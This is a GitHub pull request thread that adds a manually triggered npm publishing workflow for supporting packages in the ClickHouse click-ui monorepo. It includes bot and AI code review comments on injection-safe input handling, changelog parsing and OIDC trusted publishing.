chore(monorepo): 🤖 Independent Package Publisher (NPM)

[punkbit]

Why?

The existing release workflow's hardcoded for @clickhouse/click-ui. Supporting packages like design-tokens that live under ./packages/* need a way to publish independently without coupling to the click-ui release cycle (e.g. test/release-candidate -> stable -> latest) and related side-effects (e.g. branch name chore/v<Major.minor.patch>.

💡 In the next iteration, this workflow can have a similar automation to click-ui

⚠️ WARNING: This will require the npm admin to publish an initial placeholder version to NPM due to OIDC workflow whitelistening. See npm/cli#8544. setup-npm-trusted-publish, a dedicated tool for this, can be used to publish a "dummy" package to npm:

npx --yes setup-npm-trusted-publish <package-name>

How?

• Added a manually triggered workflow that dynamically loads package config from packages//package.json, builds, validates, and publishes to npm (due to command conventions for changelogs, build)
• Supports dry_run mode for safe validation (npm publish --dry-run), skipping GitHub release and Slack notification
• Added documentation section explaining manual changeset responsibility (enter/leave pre-release, changeset version) vs the automated click-ui flow
• Updated README.md release section to link both workflows

Preview?

N/A

[changeset-bot]

⚠️ No Changeset found

Latest commit: 57ce616

Merging this PR will not cause a version bump for any packages. If these changes should not result in a new version, you're good to go. If these changes should result in a version bump, you need to add a changeset.

This PR includes no changesets

When changesets are added to this PR, you'll see the packages that this PR includes changesets for and the associated semver types

Click here to learn what changesets are, and how to add one.

Click here if you're a maintainer who wants to add a changeset to this PR

[punkbit]

• Awk changelog extraction is fragile (line 210): The pattern ## [0-9] to find the next section boundary won't match changelog headings in ## [1.0.0] bracket format (standard Keep a Changelog style). Changesets uses the un-bracketed format by default, so this works for now, but a more robust terminator like ## [0-9\[] would be more defensive.

This has been covered in #947. Please ignore!

• Awk pattern uses unescaped dots in $VERSION (line 210): awk "/## $VERSION/,/## [0-9]/" — dots in 1.0.0 match any character in the regex. For a version like 1.0.0, this is benign in practice, but 1X0X0 would also match. Escape dots: VERSION_ESCAPED="${VERSION//./\\.}" and use that in the awk pattern.

This has been covered in #947. Please ignore!

[github-actions]

🚨 Must Fix

• Unescaped dots in awk VERSION pattern (.github/workflows/monorepo-package-release.yml line 206): awk "/## $VERSION/,/## [0-9]/" — dots in 1.0.0 match any character in awk regex. A version like 1.0.0 would also match 1X0X0. Fix: VERSION_ESCAPED="${VERSION//./\\.}" and use $VERSION_ESCAPED in the awk pattern.

Anything related with parsing the changelog + AWK should be ignored because this has been covered in #947. Please ignore!

[Copilot]

Pull request overview

Adds a manually triggered GitHub Actions workflow to publish non-Click UI packages from the monorepo to npm using OIDC trusted publishing, and updates release/security documentation to reflect the new flow.

Changes:

• Added monorepo-package-release.yml workflow to build, validate, and publish a selected ./packages/* workspace with optional dry-run mode.
• Documented monorepo package release responsibilities (manual changeset/versioning) and npm trusted publisher setup requirements.
• Updated README release section to point to both Click UI and monorepo package release docs.

Reviewed changes

Copilot reviewed 4 out of 4 changed files in this pull request and generated 3 comments.

File	Description
packages/click-ui/docs/package-release.md	Adds documentation for the new monorepo package release workflow and npm trusted publishing setup.
README.md	Links release docs for Click UI vs supporting monorepo packages.
.llm/SECURITY.md	Adds guidance about avoiding workflow_dispatch input interpolation in run: blocks to prevent shell injection.
.github/workflows/monorepo-package-release.yml	Introduces a manual, package-selectable npm publisher workflow using OIDC/provenance with optional dry-run, GitHub release, and Slack notification.

---

💡 Add Copilot custom instructions for smarter, more guided reviews. Learn how to get started.

[github-actions]

Claude finished @punkbit's task in 1m 51s —— View job

---

PR Review

Nice clean-up across these commits — the two blockers from the previous review are resolved. Here's the updated state:

---

✅ Previously flagged blockers — now resolved

• Merge conflict in FileTabs.test.tsx → fixed in 72f8c731
• softprops/action-gh-release@v1 → updated to @v2 in line 220 ✅
• env: blocks added to the version-check and changelog-extraction steps (lines 165–166, 199–201) ✅
• npm upgrade step correctly removed — setup-node@v6 with Node 23 ships npm 10.x ✅

---

💡 Suggestions (non-blocking)

• registry-url may be redundant (.github/workflows/monorepo-package-release.yml line 123): setup-node with registry-url writes a .npmrc expecting NODE_AUTH_TOKEN, but it's never set in the workflow. OIDC publishing via --provenance handles authentication independently of NODE_AUTH_TOKEN, so this likely works — but the stale .npmrc entry is noise. Consider removing registry-url to match create-release.yml, or explicitly document that OIDC auth bypasses it.

• Changelog awk extraction (line 206): Already tracked in chore(ci): 🤖 improve changelog parsing #947 — no action needed here.

• design-tokens package doesn't exist yet (line 20): Already noted — the workflow will fail at the "Load package configuration" step until the package lands. The PR description covers this, but a [!NOTE] comment in the workflow itself would help future trigger attempts.

---

✅ No issues with:

• All string inputs correctly passed via env: into run: blocks — consistent with .llm/SECURITY.md
• dry_run (boolean) and release_type (choice) safely interpolated per SECURITY.md
• Tag creation handled by softprops/action-gh-release via GitHub API — no explicit git tag needed
• confirm_package + confirm_branch double-confirmation pattern is a good safeguard
• id-token: write + --provenance OIDC setup is correct

[github-actions]

Claude finished @punkbit's task in 1m 23s —— View job

---

PR Review

• Read changed files
• Review workflow and security docs
• Post final review

---

This is a well-structured workflow addition. All previously flagged blockers are resolved. Here's the current state:

✅ Previously resolved

• softprops/action-gh-release@v2 ✅
• env: blocks on version-check and changelog steps ✅
• npm upgrade step removed (setup-node@v6 + Node 23 ships npm 10.x) ✅
• Git tag creation handled by softprops/action-gh-release via GitHub API ✅
• All free-text string inputs passed via env: per SECURITY.md ✅

---

💡 Suggestions (non-blocking — all previously noted)

• registry-url may be redundant (monorepo-package-release.yml line 123): setup-node with registry-url writes a .npmrc expecting NODE_AUTH_TOKEN, but that env var is never set. OIDC publishing via --provenance authenticates independently, so this likely works — but the stale .npmrc entry is noise. Consider removing registry-url to match create-release.yml.

• Changelog awk (line 206): Already tracked in chore(ci): 🤖 improve changelog parsing #947 — no action needed here.

• design-tokens package doesn't exist yet (line 20): Workflow will fail at "Load package configuration" until the package lands. The PR description notes this; a [!NOTE] inline comment in the workflow would help future trigger attempts.

---

✅ No issues with:

• ${{ inputs.dry_run }} (boolean) and ${{ inputs.release_type }} (choice) used directly in run: blocks — both safe to interpolate per SECURITY.md ✅
• id-token: write + --provenance OIDC setup is correct ✅
• confirm_package + confirm_branch double-confirmation guard is a solid safeguard ✅
• Slack notification correctly gated on both !dry_run and secret existence ✅
• Documentation in package-release.md is clear and actionable ✅

[github-actions]

Claude finished @punkbit's task in 1m 6s —— View job

---

PR Review

• Read changed files
• Review workflow and security docs
• Post final review

---

This is a clean, well-structured workflow addition. All blockers from previous review rounds are resolved. Here's the current state:

✅ Previously resolved

• softprops/action-gh-release@v2 ✅
• env: blocks on all free-text string inputs ✅
• npm upgrade step correctly removed (setup-node@v6 + Node 23 ships npm 10.x) ✅
• env: blocks added to version-check and changelog steps ✅
• Git tag creation handled by softprops/action-gh-release via GitHub API ✅

---

💡 Suggestions (non-blocking — previously noted, included for completeness)

• registry-url may be redundant (monorepo-package-release.yml line 123): setup-node with registry-url writes a .npmrc expecting NODE_AUTH_TOKEN, but that env var is never set. OIDC publishing via --provenance authenticates independently. Consider removing to match create-release.yml, or add a comment explaining the intent.

• Changelog awk extraction (line 206): Already tracked in chore(ci): 🤖 improve changelog parsing #947 — no action needed here.

• design-tokens package doesn't exist yet (line 20): Workflow will fail gracefully at "Load package configuration" once triggered. A [!NOTE] inline comment in the workflow would help future trigger attempts.

---

✅ No issues with:

• ${{ inputs.dry_run }} (boolean) and ${{ inputs.release_type }} (choice) interpolated directly in run: blocks — safe per SECURITY.md ✅
• id-token: write + --provenance OIDC setup is correct ✅
• confirm_package + confirm_branch double-confirmation guard is solid ✅
• Slack notification correctly gated on both !dry_run and secrets.SLACK_BOT_TOKEN != '' ✅
• All free-text string inputs (confirm_package, confirm_branch) passed via env: ✅
• Step output values (package_name, version) used safely via env: in shell steps ✅

[workflow-authentication-public]

📚 Storybook Preview Deployed

✅ Preview URL: https://click-7o5so5rqb-clickhouse.vercel.app

Built from commit: c97c2b3f5bbad7ae1ef8ea877d552bd4e25f1f79